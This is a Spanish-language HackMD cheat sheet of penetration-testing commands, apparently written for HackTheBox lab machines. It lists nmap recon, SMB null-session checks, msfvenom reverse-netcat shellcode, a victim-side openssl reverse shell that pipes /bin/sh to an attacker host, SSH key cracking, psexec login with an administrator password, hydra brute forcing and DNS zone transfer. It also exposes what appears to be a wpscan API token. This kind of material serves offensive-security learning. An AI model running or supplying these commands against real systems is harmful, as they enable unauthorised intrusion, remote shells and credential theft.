Metodologia - HackMD

# Metodologia [TOC] Comando utilizados # RECON `nmap -p- --open -sS --min-rate 5000 -Pn -n -vvv 10.10.10.3 -oG ports.gp` `nmap -p21,22,139,445,3632 -sV --min-rate 5000 -sS -sC -Pn -n -vvv 10.10.10.3 -oN scan.txt` Extraer puertos de archivo grepeable de NMAP: `cat ports.gp | grep -o "[0-9]*/open/tcp" | cut -d "/" -f1 | tr "\n" "," | sed "s/,$//"` # SMB SCAN ## NULL SESIONS `crackmapexec smb 10.10.10.3 -u '' -p '' --shares` `docker run -it -rm byt3bl33d3r/crackmapexec smb 10.10.10.3 -u '' -p '' --shares` # Escaneo web ## Wordpress ``` API: HyQRUJKHORgVY8YqjTiDhnab0JbnkS5pF10FCYCTtMM wpscan --disable-tls-checks --url https://brainfuck.htb/ -e ap,u,dbe --api-token <vuestra api de wpscan> ``` ## Escaneo servidor web `nikto -h http://<WEB SERVER>` ## Directory Fuzzing con nmap `nmap --script http-enum -p80 <IP>` ## Deteccion de tecnologias web `whatweb <web server>` # Generar shellcode ## metasploit `msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.5 LPORT=443 -f python` # Reverse Shell ## SSL ```bash= openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 4242 or ncat --ssl -vv -l -p 4242 # Victima mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s ``` # Password Cracking ## SSH_KEY RSA CRACKING ``` ssh2john.py id_rsa > key.txt john -w:rockyou.txt key.txt ``` # Exploit MS17-010 (manualmente de manera sencilla) https://www.exploit-db.com/exploits/42315 https://redteamzone.com/EternalBlue/ # Correr comandos en una maquina windows remotamente (util en privesc) `winexe -U {User}%{Password} //{HOST} '{comando a ejecutar}'` # Conseguir shell con psexec `python psexec.py 'administrator:u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97` # APROVECHAR PUT HTTP METHOD https://www.hackingarticles.in/multiple-ways-to-exploiting-put-method/ https://www.ethicalhacker.net/forums/topic/http-header-put-delete-etc/ # Listado herramientas ejecutar comandos en maquinas windows a traves de smb ``` psexec smbexec wmiexec winexe ``` # Enumeracion DNS ## Sacar NS `dig <dominio> ns` ## Sacar MX `dig <dominio> mx` ## Ataque AXFR `dig <dominio> @<IP> axfr` # Ataques de fuerza bruta ## HTTPS `hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -v https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."` # Port Knocking `python3 knock 10.10.10.43 571 290 911`